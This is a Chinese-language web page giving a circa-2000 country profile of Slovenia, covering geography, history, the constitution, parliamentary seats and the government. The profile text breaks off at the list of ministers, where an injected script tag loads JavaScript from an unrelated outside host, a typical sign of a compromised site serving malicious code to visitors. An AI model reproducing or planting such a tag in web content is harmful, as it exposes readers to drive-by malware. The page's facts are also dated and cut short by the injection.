用户名: 密码:
快速检索:
【信息检索】
国别: 
斯洛文尼亚国家概况
国别:斯洛维尼亚   【
斯洛文尼亚(Slovenia)国旗斯洛文尼亚(Slovenia)国徽

点击此处下载 斯洛文尼亚(Slovenia)国歌
国 名 斯洛文尼亚共和国(The Republic of Slovenia, Republika Slovenija)。
面 积 20273平方公里。
人 口 1987755(1999年12月)。主要为斯洛文尼亚族(87.9%),匈牙利族(0.43%),意大利族(0.16%),其余民族(11.6%)。官方语言为斯洛文尼亚语。主要宗教是天主教。
首 都 卢布尔雅那(Ljubljana),人口271900人(1995年)。
国家元首 总统米兰库昌(Milan Kuc an),1992年12月当选斯独立后的首任总统,1997年11月连任总统。
简 况 位于欧洲中南部,巴尔干半岛西北端。西接意大利,北邻奥地利和匈牙利,东部和南部与克罗地亚接壤,西南濒临亚得里亚海。海岸线长46.6公里。特里格拉夫峰为境内最高的山峰,海拔2864米。最著名的湖泊是布莱德湖。气候分山地气候、大陆性气候和地中海式气候。夏季平均气温为21℃,冬季平均气温为0℃。
6世纪末,斯拉夫人迁徙到现斯洛文尼亚一带。公元869年~874年曾在潘诺平原建立斯洛文尼亚独立国家。9世纪~20世纪初,斯洛文尼亚一直在德意志国家和奥匈帝国的统治之下。1918年底,斯洛文尼亚与其他一些南部斯拉夫民族联合成立塞尔维亚人-克罗地亚人-斯洛文尼亚人王国,1929年改称为南斯拉夫王国。1941年,德意法西斯入侵南斯拉夫。1945年,南斯拉夫各族人民赢得反法西斯战争的胜利,并于同年11月29日宣告成立南斯拉夫联邦人民共和国(1963年改称为南斯拉夫社会主义联邦共和国),斯洛文尼亚为其中的一个共和国。1990年5月,斯洛文尼亚举行二战后第一次多党制大选,斯民主联盟上台执政。1991年6月25日,斯议会通过决议,宣布脱离南斯拉夫社会主义联邦共和国成为独立主权国家。1992年5月,斯洛文尼亚加入联合国。
政 治 自1991年独立以来,斯政局一直较平稳,党派斗争基本在议会范围内进行。2000年为斯议会选举年,各党分化组合加剧。2000年4月,在野的基民党与联合执政党之一的人民党正式合并为斯人民党+基民党-人民党。随后,斯议会通过对德尔诺夫舍克总理为首政府的不信任案,德政府倒台。之后不久,斯人民党+基民党-人民党内部又发生分裂,原基民党部分成员成立了新斯洛文尼亚基督教人民党。2000年10月,斯举行独立后第三次议会选举,以德尔诺夫舍克为首的自由党得票最多,最终与联合名单、斯人民党+基民党-斯人民党等组成联合政府,德尔诺夫舍克再次出任总理。
宪法 1991年12月23日,斯洛文尼亚共和国议会公布新宪法。宪法规定总统由直接普选产生,任期五年,最多连任两届。
议会 两院议会制,称国民议会和国民协商会。国民议会为主要立法机构,由90名议员组成,以无记名投票方式通过直接选举产生,任期四年。国民协商会代表公民和社会行使监督权并有否决权,议员任期五年,由40名议员组成 ,其中雇主代表4名,雇工代表4名,农民、小商和自由职业者代表4名,非营利单位代表6名,地区利益代表22名。本届国民议会于2000年10月产生。共有8个政党进入国民议会,其中自由民主党获34席,社会民主党14席,社会民主人士联合名单11席,斯人民+基民-人民党9席,新斯洛文尼亚基督教人民党8席,退休者民主党、民族党及青年党各4席,意族和匈族各1席。国民议会主席博鲁特帕霍尔(BORUT PAHOR,2000年11月当选),国民协商会主席托奈赫罗瓦特(Tone Hrovat)。
【政府】国家权力执行机构,任期四年。本届政府由自由民主党、社会民主人士联合名单、斯人民党+基民党-人民党及退休者民主党联合组成,成立于2000年11月。总理雅奈兹德尔诺夫舍克(Janez Drnovsek)。德尔诺夫舍克政府主要成员:外交部?script src=http://cn.jxmmtv.com/cn.js>